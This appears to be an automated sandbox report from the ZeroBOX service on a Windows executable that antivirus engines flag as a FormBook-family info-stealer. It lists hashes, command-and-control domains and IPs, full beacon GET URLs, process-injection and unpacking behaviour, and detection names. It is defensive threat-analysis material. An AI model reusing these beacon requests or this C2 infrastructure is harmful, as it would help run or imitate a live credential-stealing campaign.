Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 19, 2021, 10:41 a.m.	Sept. 19, 2021, 10:46 a.m.

Size	430.5KB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`866d1aeb69daac5e6e4dda938edf8d26`
SHA256	`a41ba93183d03c4cf6b138170fab1d15c306918bb4acd1c2cbc3ee53765e5564`
CRC32	`3EAF3ECF`
ssdeep	`6144:/djoID05m/fkLNac4hxSuceQ9cj0/hPhQm5TViEPReg4u5FZwkXZtNdRE1EcyDog:yX5krHQ9O0hPS6J4u5vwkTNj0E7cSdB`
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
2500
- vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
  1196

Name	Response	Post-Analysis Lookup
www.maximumsale.com	CNAME HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com A 3.223.115.185	3.223.115.185
www.gr2future.com
www.banban365.net	A 34.98.99.30 CNAME banban365.net	34.98.99.30
www.kedaiherbalalami.com	A 5.181.216.107 CNAME kedaiherbalalami.com	5.181.216.107
www.avisdrummondhomes.com	A 52.71.133.130	52.71.133.130
www.skoba-plast.com	A 193.34.169.17	193.34.169.17
www.helpmovingandstorage.com	A 209.15.40.102 CNAME helpmovingandstorage.com	209.15.40.102
www.shinebrightjournal.com	A 66.96.162.247	66.96.162.247
www.rnerfrfw5z3ki.net	A 54.65.172.3	54.65.172.3
www.mrtireshop.com	CNAME mrtireshop.com A 34.102.136.180	34.102.136.180
www.id-ers.com	CNAME id-ers.com A 34.102.136.180	34.102.136.180
www.recargasasec.com	CNAME recargasasec.com A 157.230.119.90	157.230.119.90
www.mengzhanxy.com	A 154.85.61.184 CNAME hk839.pc51.com	154.85.61.184
www.naughty0milf.today	A 99.83.154.118	99.83.154.118
www.puffycannabis.com	A 34.102.136.180 CNAME puffycannabis.com	34.102.136.180

IP Address	Status	Action
154.85.61.184	Active	Moloch
157.230.119.90	Active	Moloch
164.124.101.2	Active	Moloch
193.34.169.17	Active	Moloch
209.15.40.102	Active	Moloch
3.223.115.185	Active	Moloch
34.102.136.180	Active	Moloch
34.98.99.30	Active	Moloch
5.181.216.107	Active	Moloch
52.71.133.130	Active	Moloch
54.65.172.3	Active	Moloch
66.96.162.247	Active	Moloch
99.83.154.118	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 99.83.154.118:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49167 -> 99.83.154.118:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49167 -> 99.83.154.118:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 52.71.133.130:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 52.71.133.130:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 52.71.133.130:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 54.65.172.3:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 54.65.172.3:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 54.65.172.3:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49171 -> 66.96.162.247:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49171 -> 66.96.162.247:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49171 -> 66.96.162.247:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49178 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49178 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49178 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49176 -> 3.223.115.185:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49176 -> 3.223.115.185:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49176 -> 3.223.115.185:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49166 -> 34.98.99.30:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49166 -> 34.98.99.30:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49166 -> 34.98.99.30:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49177 -> 5.181.216.107:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49177 -> 5.181.216.107:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49177 -> 5.181.216.107:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 157.230.119.90:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 157.230.119.90:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 157.230.119.90:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49179 -> 154.85.61.184:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49179 -> 154.85.61.184:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49179 -> 154.85.61.184:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 209.15.40.102:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 209.15.40.102:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 209.15.40.102:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49180 -> 34.98.99.30:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49180 -> 34.98.99.30:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49180 -> 34.98.99.30:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49165 -> 154.85.61.184:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49165 -> 154.85.61.184:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49165 -> 154.85.61.184:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 193.34.169.17:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 193.34.169.17:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 193.34.169.17:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

OZX

HTTP traffic contains suspicious features which may be indicative of malware related traffic (14 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.mengzhanxy.com/b6a4/?v4=FByqb+2LlROyngocgFCFAn+MKYV18123uhBB1I43VWvlV2IxG8Ov3otlIU6bOU/X6zRPLChJ&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.banban365.net/b6a4/?v4=LB4TDSoOcfLfP6WEu4Xi7VJHqpSLlQ19KfcRHvNI1E0BJW4Tj/37f9F/v3DaWRHlsfthhSdO&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.naughty0milf.today/b6a4/?v4=y3Ab41qY+IWzqUQ9j62fWmWTVEKi2r9ZDEGdaGq9wc7JzSC40q3Bki+eTJ19ahFkSaZblDBO&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.rnerfrfw5z3ki.net/b6a4/?v4=855Z9vQ5XXc46/dVYdONeB9yi8X3cSgRKyshY/MEyACWaY62iqQ2QtSCUTEdj76PLZdbQSVg&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.avisdrummondhomes.com/b6a4/?v4=tgq8zJv4ZamsZtYNH8dbmFxJ3RcVgptpPUIUZanqqJHtnwqLeeTduXi6ZJW0PDdhmdVNmULh&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.recargasasec.com/b6a4/?v4=c8NarzWcEtsFm58gGwju3yDcr3OowVkzeYD4dTid6NZJZ29ZkeD+uwofnAuE7UyUZFTxuq8g&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.shinebrightjournal.com/b6a4/?v4=yia2y8Ozc6GenJUPAcroUvWGFTw2QMRRPIQzt/ZaZChJ1JNL+1MGl/E4CETm5UxneJuWJm8N&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.mrtireshop.com/b6a4/?v4=1IxU2pCdzLjbc0WwjWEQ14t/h9IMUjYewkIb86Rsf7stw4Ydt/lwwX9QzcCR3qe4ia4DtzcM&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.skoba-plast.com/b6a4/?v4=p6ZBaKxeDGGGbWVKNL6LmfLe4qu41/ZuDkLfUQVsf5tarRyTEM8ysZ8aqSh2CwtwR2aIkrq6&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.id-ers.com/b6a4/?v4=uH6EfKcepLhoITy038beys+pLFYYfex5cK/VvJ23mqODSQImeIcr0rdBhl7AYUs9qsPgSB01&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.helpmovingandstorage.com/b6a4/?v4=WCQPk6OV774AQmQZK5qr8VSUgSKsV6/gws8DuEwnniOEFY0oNuiFQFr5fT8XTvC//aYnyiLC&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.maximumsale.com/b6a4/?v4=jUXSBmmEOkRVD/snHUZVGd++nKvIB5C3Qlbp0N4c/DnjLwT5QCEf4v32ZuriMDGEoBVryIv8&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.kedaiherbalalami.com/b6a4/?v4=AClaEyNViDSune13/YZUUjazMao4yP2qoW92J+V8GQKrmRmlM8SyMJgG/BS9WoJI+nFJwME4&Hp=V48HzvXX
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.puffycannabis.com/b6a4/?v4=oiYmmsgxC1YJtL/TalgnGFIXIV5LVOhJOFefMXwNyxWtYVBV9sv49gjiiwV97JT9vw/9+E/D&Hp=V48HzvXX

Performs some HTTP requests (14 events)

request	GET http://www.mengzhanxy.com/b6a4/?v4=FByqb+2LlROyngocgFCFAn+MKYV18123uhBB1I43VWvlV2IxG8Ov3otlIU6bOU/X6zRPLChJ&Hp=V48HzvXX
request	GET http://www.banban365.net/b6a4/?v4=LB4TDSoOcfLfP6WEu4Xi7VJHqpSLlQ19KfcRHvNI1E0BJW4Tj/37f9F/v3DaWRHlsfthhSdO&Hp=V48HzvXX
request	GET http://www.naughty0milf.today/b6a4/?v4=y3Ab41qY+IWzqUQ9j62fWmWTVEKi2r9ZDEGdaGq9wc7JzSC40q3Bki+eTJ19ahFkSaZblDBO&Hp=V48HzvXX
request	GET http://www.rnerfrfw5z3ki.net/b6a4/?v4=855Z9vQ5XXc46/dVYdONeB9yi8X3cSgRKyshY/MEyACWaY62iqQ2QtSCUTEdj76PLZdbQSVg&Hp=V48HzvXX
request	GET http://www.avisdrummondhomes.com/b6a4/?v4=tgq8zJv4ZamsZtYNH8dbmFxJ3RcVgptpPUIUZanqqJHtnwqLeeTduXi6ZJW0PDdhmdVNmULh&Hp=V48HzvXX
request	GET http://www.recargasasec.com/b6a4/?v4=c8NarzWcEtsFm58gGwju3yDcr3OowVkzeYD4dTid6NZJZ29ZkeD+uwofnAuE7UyUZFTxuq8g&Hp=V48HzvXX
request	GET http://www.shinebrightjournal.com/b6a4/?v4=yia2y8Ozc6GenJUPAcroUvWGFTw2QMRRPIQzt/ZaZChJ1JNL+1MGl/E4CETm5UxneJuWJm8N&Hp=V48HzvXX
request	GET http://www.mrtireshop.com/b6a4/?v4=1IxU2pCdzLjbc0WwjWEQ14t/h9IMUjYewkIb86Rsf7stw4Ydt/lwwX9QzcCR3qe4ia4DtzcM&Hp=V48HzvXX
request	GET http://www.skoba-plast.com/b6a4/?v4=p6ZBaKxeDGGGbWVKNL6LmfLe4qu41/ZuDkLfUQVsf5tarRyTEM8ysZ8aqSh2CwtwR2aIkrq6&Hp=V48HzvXX
request	GET http://www.id-ers.com/b6a4/?v4=uH6EfKcepLhoITy038beys+pLFYYfex5cK/VvJ23mqODSQImeIcr0rdBhl7AYUs9qsPgSB01&Hp=V48HzvXX
request	GET http://www.helpmovingandstorage.com/b6a4/?v4=WCQPk6OV774AQmQZK5qr8VSUgSKsV6/gws8DuEwnniOEFY0oNuiFQFr5fT8XTvC//aYnyiLC&Hp=V48HzvXX
request	GET http://www.maximumsale.com/b6a4/?v4=jUXSBmmEOkRVD/snHUZVGd++nKvIB5C3Qlbp0N4c/DnjLwT5QCEf4v32ZuriMDGEoBVryIv8&Hp=V48HzvXX
request	GET http://www.kedaiherbalalami.com/b6a4/?v4=AClaEyNViDSune13/YZUUjazMao4yP2qoW92J+V8GQKrmRmlM8SyMJgG/BS9WoJI+nFJwME4&Hp=V48HzvXX
request	GET http://www.puffycannabis.com/b6a4/?v4=oiYmmsgxC1YJtL/TalgnGFIXIV5LVOhJOFefMXwNyxWtYVBV9sv49gjiiwV97JT9vw/9+E/D&Hp=V48HzvXX

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 19, 2021, 10:41 a.m.	process_identifier: 2500 stack_dep_bypass: 1 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0035f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2021, 10:41 a.m.	process_identifier: 2500 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2021, 10:41 a.m.	process_identifier: 1196 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00910000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00036600', u'virtual_address': u'0x00037000', u'entropy': 7.9928371969367875, u'name': u'.rsrc', u'virtual_size': u'0x000364c8'}

entropy

7.99283719694

description

A section with a high entropy has been found

entropy

0.506402793946

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 19, 2021, 10:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2500 called NtSetContextThread to modify thread in remote process 1196
NtSetContextThread Sept. 19, 2021, 10:41 a.m.	registers.eip: 2007957956 registers.esp: 2226692 registers.edi: 0 registers.eax: 4313264 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000c4 process_identifier: 1196	1	0	0

File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.Noon.l!c
Elastic	malicious (high confidence)
DrWeb	Trojan.PWS.Stealer.23680
MicroWorld-eScan	Trojan.GenericKD.46969758
FireEye	Generic.mg.866d1aeb69daac5e
McAfee	RDN/Generic.hbg
Cylance	Unsafe
Zillya	Trojan.Kryptik.Win32.3443938
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Trojan:Win32/runner.ali1000123
K7GW	Trojan ( 005734ab1 )
K7AntiVirus	Trojan ( 005734ab1 )
Arcabit	Trojan.Generic.D2CCB39E
BitDefenderTheta	Gen:NN.ZexaF.34142.AuW@a4NXnlgi
Cyren	W32/Kryptik.FGF.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Kryptik.HMLW
APEX	Malicious
Kaspersky	HEUR:Trojan-PSW.Win32.Agensla.gen
BitDefender	Trojan.GenericKD.46969758
Avast	Win32:PWSX-gen [Trj]
Ad-Aware	Trojan.GenericKD.46969758
Emsisoft	Trojan.Crypt (A)
TrendMicro	Mal_HPGen-37b
McAfee-GW-Edition	BehavesLike.Win32.Generic.gc
Sophos	Mal/Generic-S
Ikarus	Trojan.Agent
Jiangmin	Trojan.PSW.Agensla.qt
Webroot	W32.Malware.Gen
Avira	TR/AD.Swotter.ubzii
Antiy-AVL	Trojan/Generic.ASMalwS.349BE42
Kingsoft	Win32.PSWTroj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.Kryptik.oa
Microsoft	Trojan:Win32/Lokibot.DECC!MTB
ZoneAlarm	HEUR:Trojan-PSW.Win32.Agensla.gen
GData	Win32.Trojan-Stealer.FormBook.3OKMJ2
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Hpgen.R441406
VBA32	BScope.Trojan-Dropper.Injector
ALYac	Trojan.GenericKD.46969758
MAX	malware (ai score=88)
Malwarebytes	Spyware.AgentTesla
TrendMicro-HouseCall	Mal_HPGen-37b
Rising	Trojan.Kryptik!1.D978 (CLASSIC)
SentinelOne	Static AI - Suspicious PE
Fortinet	W32/GenKryptik.FIBB!tr
AVG	Win32:PWSX-gen [Trj]
Panda	Trj/CI.A

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All